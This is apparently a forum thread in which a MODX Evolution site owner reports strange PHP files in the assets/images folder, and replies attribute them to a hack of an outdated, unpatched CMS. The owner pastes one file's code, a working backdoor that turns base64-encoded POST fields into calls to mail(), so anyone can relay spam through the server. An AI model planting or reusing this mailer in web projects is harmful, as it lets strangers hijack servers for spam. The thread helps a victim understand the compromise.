There are strange php files in my modx assets -> images
cklxt.php.php.php.php
cklxt.php.php.php.php.php
If I open them, the code does not seem related to images:
<?php
$ixhpq = stripslashes(base64_decode($_POST['gqujwdb']));
$xuoh = stripslashes(base64_decode($_POST['maih']));
$iglrhrluhvqgr = stripslashes(base64_decode($_POST['mepouebon']));
$yflalhugo = stripslashes(base64_decode($_POST['cdcftxzkyrg']));
$nzcbxor = mail(stripslashes($ixhpq), stripslashes($xuoh), stripslashes($iglrhrluhvqgr), stripslashes($yflalhugo));
if($nzcbxor){echo 'nlewxnrsdqxow';} else {echo 'qhguq : ' . $nzcbxor;}
There are many more...
Are these php files supposed to in there? Or are they bugs or the site have been hacked?
Evolution CMS is no longer officially supported by MODX. Back in November, there were a series of bad hacks, and the community responsible for the code base were slow to respond. Eventually, a patch was released, but with it there were hundreds of other code changes. There are a lot of temporary solutions for preventing these hacks, but it might be best to consult an evolution developer to get your site back to normal.
I wouldn't put blame on the application, as it's over 11 years old and has only had about 12 CVE's. It was just outdated, unpatched and has been replaced by Revolution for almost half a decade.